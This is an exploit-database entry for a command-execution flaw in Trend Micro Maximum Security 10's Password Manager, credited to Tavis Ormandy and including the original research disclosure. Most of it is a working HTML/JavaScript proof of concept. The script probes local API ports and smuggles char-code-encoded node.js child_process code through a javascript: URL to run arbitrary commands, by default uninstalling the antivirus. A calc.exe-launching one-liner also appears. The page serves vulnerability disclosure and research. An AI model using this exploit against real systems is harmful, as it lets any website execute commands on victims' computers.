header-logo
Suggest Exploit
vendor:
Maximum Security 10
by:
Tavis Ormandy
7,5
CVSS
HIGH
Arbitrary Command Execution
78
CWE
Product Name: Maximum Security 10
Affected Version From: Trend Micro Maximum Security 10
Affected Version To: Trend Micro Maximum Security 10
Patch Exists: YES
Related CWE: N/A
CPE: a:trend_micro:maximum_security_10
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2013

Trend Micro Maximum Security 10 Exploit

When you install TrendMicro Antivirus on Windows, by default a component called Password Manager is also installed and automatically launched on startup. This product is primarily written in JavaScript with node.js, and opens multiple HTTP RPC ports for handling API requests. It took about 30 seconds to spot one that permits arbitrary command execution, openUrlInDefaultBrowser, which eventually maps to ShellExecute(). This means any website can launch arbitrary commands, like this: x = new XMLHttpRequest(); x.open('GET', 'https://localhost:49155/api/openUrlInDefaultBrowser?url=c:/windows/system32/calc.exe true); try { x.send(); } catch (e) {};

Mitigation:

Disable the Password Manager component of Trend Micro Antivirus.
Source

Exploit-DB raw data:

<!--
Source: https://code.google.com/p/google-security-research/issues/detail?id=693

When you install TrendMicro Antivirus on Windows, by default a component called Password Manager is also installed and automatically launched on startup.

http://www.trendmicro.com/us/home/products/software/password-manager/index.html

This product is primarily written in JavaScript with node.js, and opens multiple HTTP RPC ports for handling API requests.

It took about 30 seconds to spot one that permits arbitrary command execution, openUrlInDefaultBrowser, which eventually maps to ShellExecute().

This means any website can launch arbitrary commands, like this:

x = new XMLHttpRequest()
x.open("GET", "https://localhost:49155/api/openUrlInDefaultBrowser?url=c:/windows/system32/calc.exe true);
try { x.send(); } catch (e) {};

(Note that you cannot read the response due to the same origin policy, but it doesn't matter - the command is still executed).
-->

<html>
<head>
    <title>Trend Micro Maximum Security 10 Exploit</title>
</head>
<body>
    <p>
    Sample exploit for Trend Micro Maximum Security 10.
    <p>
    -- Tavis Ormandy.
    <p>
    Command: <input id="command" value="C:/PROGRA~1/TRENDM~1/Titanium/Remove.exe" size="64">
    <p>
    <a href="javascript:begin()">Click Here</a> to run the command above (the default will uninstall Trend Micro Maximum).
    <p>
    <img src="http://reactiongifs.us/wp-content/uploads/2013/02/awesome_to_the_max.gif">
<script>
    function begin() {
        // The command you want to run, arguments will work but don't use single quotes.
        // Lets uninstall Trend Micro.
        var cmd  = document.getElementById('command').value;

        // Start port, Trend Micro trys top open a port starting here until it works.
        var port = 49155;

        // Wrapper code to start cmd.
        var code = "topWindow.require('child_process').spawn('cmd', [ '/c', '" + cmd + "' ])"

        // We can't send quotes, so encode that via character codes.
        code = code.split('').map(function(a){ return a.charCodeAt(0) }).join(',');

        // Create the XHR's
        for (; port <= 49160; port++) {
            var x = new XMLHttpRequest();

            x.open('GET', 'https://localhost:' + port + '/api/showSB?url=javascript:eval(String.fromCharCode(' + code + '))', false);

            // We can't tell if it worked because of the cross domain policy.
            try { x.send(); } catch (e) {};
        }
    }
</script>

Navigation

Suggest Exploit

Services By CQR